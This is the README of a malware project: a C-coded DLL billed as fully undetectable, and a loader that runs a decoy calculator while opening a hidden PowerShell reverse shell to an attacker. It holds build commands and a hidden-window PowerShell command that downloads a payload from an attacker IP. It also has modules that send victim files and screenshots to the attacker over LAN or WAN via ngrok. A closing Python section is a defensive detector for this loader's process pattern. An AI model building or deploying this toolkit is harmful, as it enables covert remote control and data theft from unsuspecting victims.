DLLREVERSESHELL

A CUSTOM CODED FUD DLL, CODED IN C, THAT, WHEN LOADED VIA A DECOY WEB-DELIVERY MODULE (FIRING A DECOY PROGRAM), WILL GIVE A REVERSE SHELL (POWERSHELL) FROM THE VICTIM MACHINE TO THE ATTACKER CONSOLE, OVER LAN AND WAN.

The project comprises:

- A custom C header file, mingwdll.h

- The DLL C code, mingw_dll.c

- The loader file, loader.c, which invokes a web delivery of the DLL to the target machine and loads the DLL at runtime, showing the decoy program to the victim in the foreground and spawning a connect-back reverse shell (PowerShell) to the attacker in the background

Phase 1:

Place mingwdll.h and mingw_dll.c in the same folder and compile using:

i686-w64-mingw32-gcc -Wall -shared mingw_dll.c -o calc_helper.dll -lws2_32 -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc

This will create the FUD DLL calc_helper.dll.

File Description:

root@nautilus:~/Desktop/c_code/dll_rsh# file calc_helper.dll
calc_helper.dll: PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows

Phase 2:

Compile loader.c using:

i686-w64-mingw32-gcc loader.c -o improved_calc.exe

This will create the PE32 executable improved_calc.exe.

File Description:

improved_calc.exe: PE32 executable (console) Intel 80386, for MS Windows

When the file improved_calc.exe is run, it might initially throw a DLL load error, so I have ensured that a second call to regsvr32 is made after a _sleep() call, to ensure the DLL loads at runtime.

Once the DLL is loaded, it fires the decoy, calc.exe, and spawns a reverse shell (netcat listener on port 8080, as defined in the header file: nc -lvp 8080).

Cheers

#Captain_Nemo

https://youtu.be/HR0C_2_UAT8

POST EXPLOITATION MODULE

I have added a post-exploitation module for file transfer from the victim machine to the attacker machine.

Compile the C program, ft_clie.c, using:

i686-w64-mingw32-gcc ft_clie.c -o client_ft.exe -lws2_32 -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc

This is web-delivered to the victim through the newly incorporated system() function call in loader.c:

system("start powershell -windowstyle Hidden Invoke-WebRequest -Uri 'http://192.168.225.196/client_ft.exe' -OutFile 'client_ft.exe'");

Syntax to run client_ft.exe from the reverse shell:

.\client_ft.exe filename attackerip attackerport

for example:

.\client_ft.exe ss.txt 192.168.225.196 4444

In the meantime, compile serverfiletransfer.c using:

gcc serverfiletransfer.c -o serv

Syntax: ./serv localattackerip chosenport, for example ./serv 192.168.225.196 4444

Once the reverse shell is obtained, ready the server using ./serv on a Linux terminal and, in the reverse shell, execute .\client_ft.exe to transfer files from the victim to the attacker machine. This exploit can be leveraged to WAN using ngrok.

https://youtu.be/KJOwew96pqw

POST EXPLOITATION MODULE

The screenshot module (screenshot.cpp) will take screenshots of the remote machine, and the .bmp files can be transferred over LAN / WAN to the attacker machine.

Compilation instruction:

i686-w64-mingw32-g++ screenshot.cpp -o ss.exe -static-libstdc++ -static-libgcc -lgdi32
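
From the defender's side, the loader behaviour this README describes (a hidden-window PowerShell download started through system(), plus a regsvr32 call from the same executable) leaves a recognisable pattern in process-creation telemetry. The Python sketch below is an added example, not part of the project: the event records, PIDs, regsvr32 arguments and function names are constructed for illustration, and only the PowerShell command line is taken from the text above.

```python
import re

# Command line quoted from the loader.c system() call described above.
PS = ("powershell -windowstyle Hidden Invoke-WebRequest -Uri "
      "'http://192.168.225.196/client_ft.exe' -OutFile 'client_ft.exe'")

# Constructed process-creation records (pid, ppid, image, command line), shaped
# like Sysmon Event ID 1 fields. PIDs and the regsvr32 arguments are assumptions.
EVENTS = [
    (100, 1, "explorer.exe", "explorer.exe"),
    (200, 100, "improved_calc.exe", "improved_calc.exe"),
    (210, 200, "cmd.exe", "cmd.exe /c start " + PS),
    (211, 210, "powershell.exe", PS),
    (220, 200, "regsvr32.exe", "regsvr32 calc_helper.dll"),
    (230, 200, "calc.exe", "calc.exe"),
    (300, 100, "powershell.exe", "powershell Get-ChildItem"),
    (400, 1, "msiexec.exe", "msiexec /i vendor.msi"),
    (410, 400, "regsvr32.exe", "regsvr32 /s vendor.dll"),
]

# Hidden-window PowerShell that downloads and writes an .exe or .dll.
HIDDEN_DL = re.compile(
    r"-w[a-z]*\s+hidden\b.*\b(invoke-webrequest|iwr)\b.*-outfile\s+\S+\.(exe|dll)",
    re.I)

def signals(image, cmdline):
    found = set()
    if image.lower() == "powershell.exe" and HIDDEN_DL.search(cmdline):
        found.add("hidden_ps_download")
    if image.lower() == "regsvr32.exe":
        found.add("regsvr32_spawn")
    return found

def originator(pid, by_pid):
    """Skip cmd.exe wrappers: system() runs its command through cmd.exe /c."""
    ppid = by_pid[pid][1]
    while ppid in by_pid and by_pid[ppid][2].lower() == "cmd.exe":
        ppid = by_pid[ppid][1]
    return ppid

def detect(events):
    by_pid = {e[0]: e for e in events}
    hits = {}
    for pid, _ppid, image, cmdline in events:
        sig = signals(image, cmdline)
        if sig:
            hits.setdefault(originator(pid, by_pid), set()).update(sig)
    # Alert only when one originating process shows both behaviours.
    return {by_pid[p][2]: sorted(s) for p, s in hits.items()
            if p in by_pid and len(s) >= 2}
```

Requiring both signals under one originating process keeps the installer-driven regsvr32 call and the ordinary PowerShell session in the sample data from alerting on their own.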